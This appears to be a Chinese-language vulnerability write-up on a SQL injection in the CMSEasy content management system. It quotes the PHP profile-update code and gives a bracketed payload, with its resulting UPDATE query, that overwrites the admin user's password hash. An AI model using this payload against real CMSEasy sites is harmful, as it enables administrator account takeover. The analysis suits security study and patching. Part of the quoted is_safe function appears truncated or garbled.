cmseasy修改任意管理员密码漏洞

lib/default/user_act.php [php] function edit_action() { if(front::post('submit')) { unset(front::$post['groupid']); unset(front::$post['powerlist']); foreach (front::$post as $k => $v){ if(is_array($v) && !empty($v)){ front::$post[$k] = implode(',', $v); } front::check_type(front::post($k), 'safe'); //is_safe自定义函数对其无影响,跟进0x01 } $this->_user->rec_update(front::$post,'userid='.session::get('userid')); //问题出在这儿,跟进0x02 front::flash(lang('修改资料成功!')); front::redirect(url::create('user/index')); } $this->view->data=$this->view->user; }[/php] lib/tool/front_class.php 0x01 [php] static function check_type($var,$type='number') { $func="is_$type"; if (!$func($var)) { header("HTTP/1.0 404 Not Found"); exit('PAGE NOT FOUND!'); } } function is_safe($string) { if(!$string) return true; if(false !== strpos($string,'addslashes($string)) return false; else*/ return true; } [/php] lib/inc/table.php 0x02 [php] function rec_update($row,$where) { $tbname=$this->name; $sql=$this->sql_update($tbname,$row,$where); //echo $sql."
"; return $this->query_unbuffered($sql); } function sql_update($tbname,$row,$where) { $sqlud=''; if (is_string($row)) $sqlud=$row.' '; else foreach ($row as $key=>$value) { if (in_array($key,explode(',',$this->getcolslist()))) { $value=$value; if (preg_match('/^\[(.*)\]$/',$value,$match)) $sqlud .= "`$key`"."= ".$match[1].","; //没加引号。只要匹配上面的正则就行,中括号里面输入注入语句就行。 //[1,password=0x6531306164633339343962613539616262653536653035376632306638383365 where userid=1%23] //UPDATE `cmseasy_user` SET `nickname`= 1,password=0x6531306164633339343962613539616262653536653035376632306638383365 where userid=1 elseif ($value === "") $sqlud .= "`$key`= NULL, "; else $sqlud .= "`$key`"."= '".$value."',"; } } $sqlud=rtrim($sqlud); $sqlud=rtrim($sqlud,','); $this->condition($where); $sql="UPDATE `".$tbname."` SET ".$sqlud." WHERE ".$where; return $sql; }[/php] cms1 cms2

发表评论